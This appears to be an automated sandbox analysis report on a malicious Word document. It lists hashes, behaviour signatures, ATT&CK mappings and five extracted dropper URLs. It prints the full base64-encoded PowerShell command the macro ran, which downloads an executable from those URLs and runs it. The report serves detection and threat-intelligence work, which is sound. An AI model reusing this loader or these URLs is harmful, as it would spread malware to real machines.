e484e9b8614dff68bd63e103a395b4e03576c2f72fdcba1ff45344012e0f51b6

General

Target

ecd96bcfbfd4cf575a8720d72957a998_JaffaCakes118.doc
Size

240KB
MD5

ecd96bcfbfd4cf575a8720d72957a998
SHA1

0cbbf0fa4dff29209e586e9af524668b94ba6f1e
SHA256

e484e9b8614dff68bd63e103a395b4e03576c2f72fdcba1ff45344012e0f51b6
SHA512

ba9379f229a86f3cd69a3e96d43028e7d8589f3071a2d776b2aed284fa7ac5b6b089502833bd0d3d6429882253f53ec4c32c9cf0f6c5cf3ccf7f25f03af6419f
SSDEEP

3072:0j6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkRReZjBu7DgqwXE:0HgtEWPsL/aTyT9GkRRep1qw0

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://ukasian.com/wp-admin/Znk3yozl/

exe.dropper

http://techwala.net/wp-admin/tKX319361/

exe.dropper

http://schladzalniki.eko-bart.pl/cgi-bin/7f53903/

exe.dropper

https://mte1.cn/wp-includes/PkuVF1RiI/

exe.dropper

http://topkadry.com.ua/cgi-bin/dhH718397/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	3788	powersheLL.exe	82

Blocklisted process makes network request 6 IoCs

flow	pid	Process
27	876	powersheLL.exe
30	876	powersheLL.exe
33	876	powersheLL.exe
35	876	powersheLL.exe
39	876	powersheLL.exe
40	876	powersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3328	WINWORD.EXE
3328	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
876	powersheLL.exe
876	powersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	876	powersheLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3328	WINWORD.EXE
3328	WINWORD.EXE
3328	WINWORD.EXE
3328	WINWORD.EXE
3328	WINWORD.EXE
3328	WINWORD.EXE
3328	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ecd96bcfbfd4cf575a8720d72957a998_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3328

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABUAGgAMABjAGYAdAAzAD0AKAAnAFUAOABuAHoAJwArACcAagBnACcAKwAnAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgB0AGUATQBwAFwATwBmAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIAZQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQByAGkAdABgAFkAcAByAGAATwBUAG8AQwBgAG8AbAAiACAAPQAgACgAJwB0AGwAcwAxACcAKwAnADIALAAgAHQAbABzADEAJwArACcAMQAnACsAJwAsACAAdABsAHMAJwApADsAJABXAF8AYgA2AHEAeQAxACAAPQAgACgAJwBWAGQANQB2ACcAKwAnADYANQAnACsAJwAwACcAKQA7ACQAVgB3AHYAdwAyAGwAcAA9ACgAJwBCAG8AbgAnACsAJwA3ADMANwByACcAKQA7ACQAUwB6AHQANAA5AGYAMAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcAewAnACsAJwAwAH0ATwBmACcAKwAnAGYAaQBjAGUAMgAwADEAOQB7ADAAfQAnACkAIAAgAC0ARgBbAEMASABBAHIAXQA5ADIAKQArACQAVwBfAGIANgBxAHkAMQArACgAJwAuACcAKwAnAGUAeABlACcAKQA7ACQAWABlAGIAYgA0AGoAagA9ACgAJwBQAHUAYgBtADUAJwArACcAZQAzACcAKQA7ACQARQA0ADEAdABrAG8AeAA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBFAFQALgB3AGUAYgBDAEwAaQBFAG4AVAA7ACQAUQAzAGUAcgB3ADMAZwA9ACgAJwBoAHQAdABwACcAKwAnADoAJwArACcALwAvAHUAawBhAHMAaQBhAG4ALgBjAG8AbQAvAHcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAbgAnACsAJwAvAFoAbgAnACsAJwBrACcAKwAnADMAeQBvAHoAbAAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwB0ACcAKwAnAGUAYwBoAHcAYQBsAGEALgAnACsAJwBuAGUAdAAnACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGEAZAAnACsAJwBtAGkAbgAvACcAKwAnAHQASwBYADMAJwArACcAMQA5ADMANgAxAC8AJwArACcAKgBoAHQAdABwADoALwAvAHMAYwBoACcAKwAnAGwAYQAnACsAJwBkAHoAJwArACcAYQBsAG4AaQBrAGkALgBlACcAKwAnAGsAbwAtAGIAJwArACcAYQByAHQAJwArACcALgBwAGwALwAnACsAJwBjAGcAaQAtAGIAaQAnACsAJwBuAC8AJwArACcANwBmADUAMwAnACsAJwA5ADAAMwAvACoAaAAnACsAJwB0AHQAcABzACcAKwAnADoALwAvAG0AdABlACcAKwAnADEALgBjACcAKwAnAG4ALwB3AHAALQBpAG4AYwAnACsAJwBsAHUAZABlAHMALwBQAGsAdQBWAEYAJwArACcAMQBSAGkASQAvACoAaAB0AHQAJwArACcAcAA6AC8ALwB0AG8AJwArACcAcABrACcAKwAnAGEAZAByAHkALgBjAG8AbQAuAHUAJwArACcAYQAnACsAJwAvAGMAZwBpAC0AYgBpACcAKwAnAG4ALwBkACcAKwAnAGgASAA3ADEAJwArACcAOAAzADkANwAnACsAJwAvACcAKQAuACIAUwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABHAHIAagB1ADkAZwB6AD0AKAAnAE0AZwAnACsAJwB3ADcANAAnACsAJwB0ADEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVgA0AGEAZQBkADEAMAAgAGkAbgAgACQAUQAzAGUAcgB3ADMAZwApAHsAdAByAHkAewAkAEUANAAxAHQAawBvAHgALgAiAEQAbwBXAG4AYABMAE8AYABBAEQARgBJAGwARQAiACgAJABWADQAYQBlAGQAMQAwACwAIAAkAFMAegB0ADQAOQBmADAAKQA7ACQAUQB3AHoAMgA0ADkAegA9ACgAJwBKADgAXwBnAGsAJwArACcAZABtACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABTAHoAdAA0ADkAZgAwACkALgAiAEwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA5ADIANAA4ACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFMAegB0ADQAOQBmADAAKQA7ACQATQB3AGsAeAA4AGoAMgA9ACgAJwBPACcAKwAnAHUAdwAnACsAJwB4AG8ANwBkACcAKQA7AGIAcgBlAGEAawA7ACQAQwB6AGkAcABiAGUAbQA9ACgAJwBSAGgAYgAnACsAJwBnACcAKwAnAHMAaABvACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBqAG0AOABwAGwAMgA9ACgAJwBZAGwAaQAnACsAJwBuAGQAOQBfACcAKQA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDE09E.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcalg1be.hhv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
49681dfc91206601b9b8f39325db28f1

SHA1
b35b6e3887f33cf837ad47efbf93bca0a4349f30

SHA256
068fbbeff42d7dd10a880f4493d5c91ce3b74559abef35e062754736009bb935

SHA512
c3eae67849b6081781532caccb84fb3006ed3199b9e2b8aa8c7bcf452b380dc74fbc21143416ce8306ce9070222b6c5130e8a28f75e3678cf867a03d0c442dcc

Download Submit
memory/876-69-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/876-84-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/876-75-0x000001D673870000-0x000001D673892000-memory.dmp

Filesize
136KB

Download
memory/3328-31-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-7-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-3-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-9-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-11-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-12-0x00007FF806B30000-0x00007FF806B40000-memory.dmp

Filesize
64KB

Download
memory/3328-10-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-14-0x00007FF806B30000-0x00007FF806B40000-memory.dmp

Filesize
64KB

Download
memory/3328-16-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-15-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-13-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-30-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-0-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-8-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-6-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-5-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-80-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-4-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-85-0x00007FF848FAD000-0x00007FF848FAE000-memory.dmp

Filesize
4KB

Download
memory/3328-86-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-87-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-88-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-2-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-97-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download
memory/3328-1-0x00007FF848FAD000-0x00007FF848FAE000-memory.dmp

Filesize
4KB

Download
memory/3328-233-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-235-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-234-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-236-0x00007FF808F90000-0x00007FF808FA0000-memory.dmp

Filesize
64KB

Download
memory/3328-237-0x00007FF848F10000-0x00007FF849105000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads